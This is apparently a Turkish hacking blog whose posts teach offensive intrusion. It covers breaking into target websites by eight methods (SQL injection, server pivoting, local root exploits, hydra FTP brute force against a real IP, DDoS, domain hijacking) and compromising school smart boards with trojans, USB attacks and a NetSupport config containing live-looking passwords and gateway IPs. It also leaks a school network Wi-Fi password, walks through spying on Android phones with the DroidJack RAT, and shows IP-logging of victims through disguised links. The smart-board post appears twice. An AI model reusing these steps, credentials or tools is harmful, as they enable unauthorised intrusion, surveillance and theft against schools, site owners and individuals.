27 Eylül 2016 Salı
Hedef siteye erişme (Hackleme)
Merhaba arkadaşlar, bu konuda hedef siteye 8 farklı methodla erişmeyi göstereceğim.
1.) Web uygulama açıklarını bulup siteye erişmeye çalışıyoruz. SQL injection, Blind sql injection,
Admin Login injection, Remote Code Execute(Rce), Remote Command Execute, Cross Site Scripting, Cross-Site Request Forgery ,Bof, Lfi , Rfi gibi açıkları bulup exploit ediyoruz.
Site hazır script kullanıyorsa scriptin sürümünü öğrenip exploit-db.com 0day.today gibi
Exploit sitelerinden exploit bulup exploit ediyoruz.
Güvenlik açığı bulmak için hazır scriptleri kullanmanıza gerek yok tüm açıklıkları en ince
ayrıntısına kadar inceleyin sonra manuel olarak açıklıkları nasıl buluyorsanız programa dökün. premium açık tarama programlarından daha iyi sonuç verecektir : )
2.) Hedef sitede güvenlik açıkları yok ise whois çekip sitenin kullandığı nameserverlara bakıyoruz veya ip adresini öğrenip bing de ip: şeklinde taratıp ip uzerindeki diğer siteleri buluyoruz. örnek: sitenin ip adresi 111.111.111.111 olsun bing.com dan ip:111.111.111.111
Şeklinde taratıyoruz veya who.is/nameserver den whois sonucu cıkan nameserverleri yazıp serverdaki diger siteleri görebiliyoruz.
ip aralıklarındada aynı aynı serverda olan sitelere rastlanabiliyor.
https://ct-scorpi10.blogspot.com/2016/09/web-sitesinde-ip-aralklar-taramas.html
Siteleri listeledikten sonra aynı sitelere 1.methodu kasıyoruz. Her sitede güvenlik açığı arıyoruz aynı serverdaki siteye erişdiğimizde ise servera shell atıp local root exploitleri ile
serverda root oluyoruz veya webr00t shell ile config okuyup serverdaki diğer sitelere erişebiliyoruz. 2methotda olmadıysa webr00t shellin cgitelnet shellini çalıştırıp cat /etc/passwd komutunu giriyoruz. Serverdaki tüm kullanıcıları gösterir. Genellikle site isimleri gibi kullanıcı adları olur.
örn: portwood:*:11401134:100450:portwood:/home/content/34/11401134:/sbin/nologin
portwood kullanıcısının sitesi portwood.com .org olma olasılığı yüksektir. Configde gördüğümüz gibi sitenin dizini /home/content/34/11401134 cd komutu ile servarın dizinine gidiyoruz. İzinler yok ise chmod izni yok ise ;
https://ct-scorpi10.blogspot.com/2016/09/chmod-change-mod-nedir.html
konudan chmodu öğrenip bulunduğunuz dizine perm yetkisi verip sitenin bulunduğu dizine erişip indexinizi upload edebilirsiniz.
3.) who.is den sitemize whois çekiyoruz Sitenin admin e-mail adresini bulup 1 ve 2. methodları admin e-mail sitesine kasıyoruz. Admin e-mailin bulunduğu siteye eriştiğimiz zaman yönetim panelinden mail panelini bulup mailin şifresini alıp domain firmasından şifremi unuttum çekip hedef siteye erişebiliyoruz. Eğer mail panelini bulamassanız sitedeki bir php veya asp dosyasını editleyip SQL injection oluşturulabilecek kodları başa girip sqlninja,sqlmap ile veritabanı çekip mailin şifresine erişebiliyoruz : )
4.) Bu methodda ise serverın bulunduğu siteye whois cekip nameserverlarına bakın site ile aynı serverda olmayabilir 1.3 methodları uyguluyoruz serverin bulundugu domaine erişirsek nameserverları kontrol edip hedef siteye erişebilirsiniz veya domain süresi bitmeye yakın ise bittiği gün aynı domain ismi ile 1and1.com dan 1dolara domain alıp 1yıllık index basabilirsiniz :)
Hedef sitemiz domaini türk sitelerinden satın almışsa örn:alastry.com yoncu.com gibi sitelerden almış ise pdr nin bayiliğini yapıyor yani yoncu.com sitesi veya publicdomainregistry.com 2siteden birine 1,2,3 deki methodları uygulayıp erişirseniz domain panelinden hedef siteye erişmiş olursunuz.
5.) Siteye ctrl+u tuşu ile sayfa kaynak kodlarına bakıyoruz kullandığı scripte bakıp wordpress ise wordpress.com sitesine 1den 4 e kadar tüm methodları uyguluyoruz.
Mybb ise mybb nin sitesine vb.
Hazır script sitelerine erişmek zor olsada eriştiğinizde hedef siteye erişebilirsiniz.
6.) Nmap ile sitede açık portlara bakın 1433 MsSQL 3306 MySQL 3050 gbs_db veya 1521 Oracle portlarından birtanesi açık ise ki localhostda değilse veritabanı için bu portların açık olması şart. açık olan porta ddos atıp database hatası verecektir. Hatanın verdiği ip adresine tüm methodları kasıp SQL yi dump ederseniz veritabanı bilgileri ile hedef siteye erişmiş olursunuz.
7.) Serverda navicat, Firezilla gibi programlar kulanılıyorsa kullanıldığı programın exploiti bulup erişebilirsiniz
örn: http://0day.today/exploits/25371
veya navicat gibi programların bağlı olduğu ip ye methodları kasın eriştiğinizde navicat yönetim panelinden hedef site admini ip adresi port numarası şifresi girdiğinde shell üzerinden loglayıp siteye erişebilirsiniz.
8.) Xhydra ile serverdaki ftp veya ssh hesaplarına brute force uygululuyoruz.
Terminali açıp hydra -s 21 -v -V -l kullanıcı adı eğer kullanıcı adını bilmiyorsanız -L olacak
-P şifre wordlist dizini ftp://ip adresi şeklince komutu giriyoruz.
örn: hydra -s 21 -v -V -L root/Desktop/kadları -P /root/Desktop/wordlist.txt ftp://78.143.98.210
şeklinde komutu girip saldırımızı yapıyoruz.
Serverdaki herhangi bir ftp hesabının şifresini alıp firezilla ile bağlanıp chmod 777 yaparak anadizine shellimizi upload ediyoruz. 2.methothodu kasıp serverdaki hedef siteye erişiyoruz.
Methodları anlatmam 1saatimi aldı kaynak belirtmeden çalana hakkımı helal etmiyorum.
Siber Yazılımcı Grubuna Özel yazılmıştır
23 Eylül 2016 Cuma
Akıllı tahtaya erişme (hackleme)
Merhaba arkadaşlar bu konuda akıllı tahtaya remote (uzaktan) nasıl erişildiğini anlattım.
Öncelikle anlatacağım işlemleri yalnız veya samimi arkadaşlarla yapın.
örn: Beden dersinde, ve çıkış zilinden 5-10dakika sonra gibi süre içinde yapabilirsiniz
Akıllı tahtalarda deepfreeze var ise görev yöneticisinden veya sağ alt kısımda deepfreeze ye sağ tıklayıp kapatın aksi taktirde yapacağınız işlemler bilgisayar yeniden başlatana kadar sürecektir.
1.) Usb rubber ducky methodu ile akıllı tahtaya 15sn içinde takıp çıkarın sonra kendi bilgisayarınıza takın usb linux ise linux komutları ile akıllı tahtaya erişebilirsiniz.
https://www.facebook.com/hackerowl/photos/a.1417176048298381.1073741828.1414225218593464/1464900250192627
Facebook sayfamda usb nin nasıl hazırlanacağını anlattım.
2.) Önce spy-net & Darkcoment gibi uygulamalar ile trojanımızı oluşturuyoruz.
Oluşturduğumuz trojan(rat) telefonumuza yükleyip zip yapıyoruz.
Rat bilmeyen varsa konuya edit yapıp anlatacağım.
Akıllı tahtaya Alpemix veya Teamwiever gibi uygulamalar yüklü ise açıp ıd şifreyi alıp telefondan ziplediğimiz trojanı akıllı tahtaya sürükleyip unzip yapıyoruz ve trojanı kolaylıkla yutuyor!
Trojan yedirmek istemeyen arkadaşlar için exploitde kullanabilirler.
örn: 0day.today/exploit/25390
3.) Alpemix veya Teamwiever gibi uygulamalar kurulu değilse trojanımızı herhangi bir upload sitesine upload ediyoruz.
Akıllı tahtadan trojanı indirip çalıştırabilirsiniz.
Ancak!
Trojan yedirdikten sonra restart sonucu trojan kayboluyorsa deepfreeze vb. uygulamaları denetim masası veya görev yöneticisinden devre dışı bırakmamız gerekiyor.
4:) f@tih ağına bağlanın password: !1qaz2WSX3edc4RFV%56 Bağlandıktan sonra
Androidde: Zanti Dsploit gibi uygulumalarla sniff çekip akıllı tahtaya erişebilirsiniz.
Linuxda : SniffJoje & Wireshark & Dsniff... gibi uygulamalarda sniffing yapabilirsiniz.
5.) Akıllı tahtada Netsupport uygulaması var ise ki %99 olması lazım
Evde bilgisayarınıza Netsupport kurun.
Kurduktan sonra Netsupport tech Console kısmından Licensee kısmına gelip serial numberi kopyalıyoruz.
nssadmui.exe/Netsupport client32.ini dosyasını config ayarımızı yapıştırıyoruz.
örnek ;
[Client]
_present=1
Password=1148745314
Protocols=2,3
RoomSpec=VESTEL
SecurityKey=GD<DAMDO9N?HDFGK;O@JCL9B=PBKGL
UnloadMirrorOnDisconnect=1
Usernames=*/1148745314
[_Info]
Filename=C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.ini
[Audio]
DisableAudioFilter=0
[General]
Password=EM:B>LDFHI<NAIEN:K>CAGFI<C@JEP
[HTTP]
GatewayAddress=88.249.193.13:443
GSK=HD<E@GDOHB;H@LEM;F?NDM9G>GCMHK
SecondaryGateway=88.249.194.108:443
SecondaryPort=443
kodları yapıştırıp Bilgisayarınızdan netsupport programı ile akıllı tahtaya erişebilirsiniz.
Siz kendiniz config dosyasınızı kendinize göre düzenleyin
Not : Akıllı tahtalar flash bellek ile açılıyorsa pardus ile çalıştırıp msconfig ile windowsa geçiş yapın.
Netsupport İndirme Linki : https://cloud.mail.ru/public/0fc4747b6a6c/NSS11TR.rar
Öncelikle anlatacağım işlemleri yalnız veya samimi arkadaşlarla yapın.
örn: Beden dersinde, ve çıkış zilinden 5-10dakika sonra gibi süre içinde yapabilirsiniz
Akıllı tahtalarda deepfreeze var ise görev yöneticisinden veya sağ alt kısımda deepfreeze ye sağ tıklayıp kapatın aksi taktirde yapacağınız işlemler bilgisayar yeniden başlatana kadar sürecektir.
1.) Usb rubber ducky methodu ile akıllı tahtaya 15sn içinde takıp çıkarın sonra kendi bilgisayarınıza takın usb linux ise linux komutları ile akıllı tahtaya erişebilirsiniz.
https://www.facebook.com/hackerowl/photos/a.1417176048298381.1073741828.1414225218593464/1464900250192627
Facebook sayfamda usb nin nasıl hazırlanacağını anlattım.
2.) Önce spy-net & Darkcoment gibi uygulamalar ile trojanımızı oluşturuyoruz.
Oluşturduğumuz trojan(rat) telefonumuza yükleyip zip yapıyoruz.
Rat bilmeyen varsa konuya edit yapıp anlatacağım.
Akıllı tahtaya Alpemix veya Teamwiever gibi uygulamalar yüklü ise açıp ıd şifreyi alıp telefondan ziplediğimiz trojanı akıllı tahtaya sürükleyip unzip yapıyoruz ve trojanı kolaylıkla yutuyor!
Trojan yedirmek istemeyen arkadaşlar için exploitde kullanabilirler.
örn: 0day.today/exploit/25390
3.) Alpemix veya Teamwiever gibi uygulamalar kurulu değilse trojanımızı herhangi bir upload sitesine upload ediyoruz.
Akıllı tahtadan trojanı indirip çalıştırabilirsiniz.
Ancak!
Trojan yedirdikten sonra restart sonucu trojan kayboluyorsa deepfreeze vb. uygulamaları denetim masası veya görev yöneticisinden devre dışı bırakmamız gerekiyor.
4:) f@tih ağına bağlanın password: !1qaz2WSX3edc4RFV%56 Bağlandıktan sonra
Androidde: Zanti Dsploit gibi uygulumalarla sniff çekip akıllı tahtaya erişebilirsiniz.
Linuxda : SniffJoje & Wireshark & Dsniff... gibi uygulamalarda sniffing yapabilirsiniz.
5.) Akıllı tahtada Netsupport uygulaması var ise ki %99 olması lazım
Evde bilgisayarınıza Netsupport kurun.
Kurduktan sonra Netsupport tech Console kısmından Licensee kısmına gelip serial numberi kopyalıyoruz.
nssadmui.exe/Netsupport client32.ini dosyasını config ayarımızı yapıştırıyoruz.
örnek ;
[Client]
_present=1
Password=1148745314
Protocols=2,3
RoomSpec=VESTEL
SecurityKey=GD<DAMDO9N?HDFGK;O@JCL9B=PBKGL
UnloadMirrorOnDisconnect=1
Usernames=*/1148745314
[_Info]
Filename=C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.ini
[Audio]
DisableAudioFilter=0
[General]
Password=EM:B>LDFHI<NAIEN:K>CAGFI<C@JEP
[HTTP]
GatewayAddress=88.249.193.13:443
GSK=HD<E@GDOHB;H@LEM;F?NDM9G>GCMHK
SecondaryGateway=88.249.194.108:443
SecondaryPort=443
kodları yapıştırıp Bilgisayarınızdan netsupport programı ile akıllı tahtaya erişebilirsiniz.
Siz kendiniz config dosyasınızı kendinize göre düzenleyin
Not : Akıllı tahtalar flash bellek ile açılıyorsa pardus ile çalıştırıp msconfig ile windowsa geçiş yapın.
Netsupport İndirme Linki : https://cloud.mail.ru/public/0fc4747b6a6c/NSS11TR.rar
18 Eylül 2016 Pazar
Chmod (Change mod) Nedir?
Chmod linux serverlarda erişim iznini ayarlayan mod dur.
Chmod ayarı sayesinde serverdaki dosyalara okuma-yazma-değiştirme gibi yetkiler kullanıcılara göre ayarlanabilir.
chmod 644 dosyalarda sadece okuma yetkisi bulunmaktadır.
chmod 755 dosyalarda okuma ve çalıştırma yetkisi bulunmaktadır.
chmod 777 dosyalarda ise okuma, çalıştırma ve yazma izni olur.
chmod 644 ve 755 olan dosyalarda yazma izniniz yoktur.
Dosya ve klasöre chmod ayarını 777 ayarlamak için
chmod- 777- klasör adı- şeklinde servera komut girerek klasöre full yetki verebiliriz.
örn : chmod 777 .htaccess
tüm klasörleri 777 yapmak için,
for i in `find . -type d`; do chmod 777 $i; done
tüm dosyaları 755 yapmak için,
for i in `find . -type f`; do chmod 755 $i; done
tüm dosyaları 644 yapmak için,
for i in `find . -type f`; do chmod 644 $i; done
php uzantılı dosyaları 644 yapmak için,
find . -type f -name '*.php' -print0 | xargs -0 chmod 0644
Komutunu giriyoruz.
find / -type f -perm -2 -ls / Serverdaki tüm yazılabilir dosyaları bulur.
find . -type d -perm -2 -ls / Bulunduğunuz dizindeki tüm yazılabilir dosyaları bulur.
16 Eylül 2016 Cuma
Android Telefon Hackleme (DroidJack)
Rat ile Android Telefonların nasıl hacklenebildiğini anlatıcağım.
Aşağıda vereceğim programı indirip kuruyoruz.
Duckdns.org dan kayıt oluyoruz facebook & gmail hesabınız varsa direk bağlanın.
Subdomain oluşturuyoruz ve işletim sistemine uygun programı bulup indiriyoruz.
Duckdns programına sitedeki tokeni yazıyoruz ve bağlanıyoruz.
Droidjack'a gelirsek generate apk kısmında subdomain adresimizi ve açacağımız port u yazıyoruz.
örn: scorpi10.duckdns.org port da 1604 portunu öneririm.
Modem arayuzunden portumuzu açtıktan sonra Generate seçeneğine tıklayıp apk yı oluşturuyoruz.
Devices bölümünden 1604 portumuzu dinliyoruz.
Hedef kişiye oluşan apk yı yedirdiğimizde telefonu restart yaptıktan sonra bağlantıyı alacağız.
Bağlantı geldikten sonra sağ tıklayıp telefonu dinleyebilir, sms leri okuyabilir, ön ve arka kamerasını İzleyebilir, telefon numarasını ve imei numarasını öğrenenip rehberini kopyalayabilir,
İstediğiniz kişiyi arayıp sms atabilirsiniz.
İndirme Linki : http://www.mediafire.com/download/z830ija4ou2c81b/DroidJack.4.4._ed.rar
Wordlist (Parola Listesi) Hazırlama aracı Crunch
Brute force yaparken parola listesi lazım olduğu için ve sağlam listeler aramak çok zamanımızı alır.
Aramak yerine size nasıl wordlist yapıldığını anlattım.
Not: Tool sadece Kali linuxda çalışmaktadır.
Öncelikle Terminali açıp crunch yazıyoruz.
crunch en az uzunluk - en fazla uzunluk - şifre kombinasyonu -o dosya ismi şeklinde olacaktır.
Örn: crunch 4 7 1234567 -o sifreler.txt komutu giriyoruz.
en az 4 haneli en fazla 7 haneli 1234567 kombinasyonunu karıştırarak wordlist hazırlayacaktır.
kelime ve sayı wordlisti hazırlamak istiyorsak ;
Örn: crunch 4 16 qwertyuıopğüasdfghjklşizxcvbnmöç123456789 -o şifreler.txt
Şeklinde girdigimiz taktirde brute force yaparken kırma oranı %95 a kadar çıkabiliyor.
13 Eylül 2016 Salı
Sunucudaki sitelerden Hedef siteye geçiş
Hedef site hacklemenin bir diğer methoduda aynı sunucudaki siteleri hackleyip hedef siteye geçiş sağlamaktır.
Bu konuda Sunucudaki sitelerden hedef siteye nasıl erişilebildiğini anlattım.
ct-scorpi10.blogspot.com/2016/09/hedef-sitenin-sunucusundaki-siteleri.html
Öncelikle linkdeki konuda sunucudaki sitelerin listelenmesine bakıp sunucudaki siteleri listeleyiniz.
https://ct-scorpi10.blogspot.com/2016/09/web-sitesinde-ip-aralklar-taramas.html
linkdeki konudan ip aralıkları taraması yapıp siteleri txt dosyasına kaydedin.
Veya sitenin nameserverlarını öğrenip sunucuya whois cekip siteleri çekebilirsiniz.
Kaydettiğiniz sitelerde web güvenlik açıklıkları taratın.
Sunucudaki sitelerden birinde mutlaka güvenlik açığı bulunacaktır.
https://ct-scorpi10.blogspot.com/2016/09/hedef-sitede-admin-panel-nasl-bulunur.html
Açığı bulduğunuz siteyi exploit edip
ct-scorpi10.blogspot.com/2016/09/hedef-sitede-admin-panel-nasl-bulunur.html
Admin paneli bulup sunucuya shell atın.
https://ct-scorpi10.blogspot.com/2016/09/safe-mod-kapatma-off-islemleri.html
Linkdeki anlattığım konudan safe modu kapatın.
https://ct-scorpi10.blogspot.com/2016/09/kali-linux-uzerinden-weevely-ile.html
Linux kullanıcıları weevely uzerinden
https://ct-scorpi10.blogspot.com/2016/09/dcpl-exploiti-ile-backconnect-olma.html
Windows kullanıcıları dc exploiti ile backconnect olsun.
Backconnect olduğunuz sunucuda uname -a komutu girip serverın kernel surumunu öğrenip
Kernel surumune uygun local root exploit buluyoruz.
0day.today & exploit-db.com dan
Bulduğunuz exploiti wget -r komutu ile çekip çalıştırıp root olabilirsiniz.
Root olduğunuz sunucuda hedef sitenin dizinine gelip index dosyanızı upload edebilirsiniz.
Konu çok uzun olduğu için sadece 1methodu anlattım. İstek geldiği surece diğer methodları anlatıcağım.
Karşıdaki kişinin ip adresi tespiti
Merhaba Arkadaşlar
Bugünkü konuda karşı kişiye fotograf atarak ip adresi nasıl öğrenildiğini anlattım.
hizliresim.com dan fotograf yukluyoruz.
iplogger.org sitesinden short link bölümünden yukledigimiz fotografın urlsini yazıyoruz.
iplogger in verdiği url yi bitly.com dan kısa link haline dönüştürüp kurbana atıyoruz.
kurban linke tıkladığında iplogger.org sitesine ip adresi geliyor.
Ancak!
Konum tespiti yapmak istiyorsan teamspeakın özelliğinden ip adresini yazıp şehrine kadar bulabiliriz.
Kaydol:
Kayıtlar (Atom)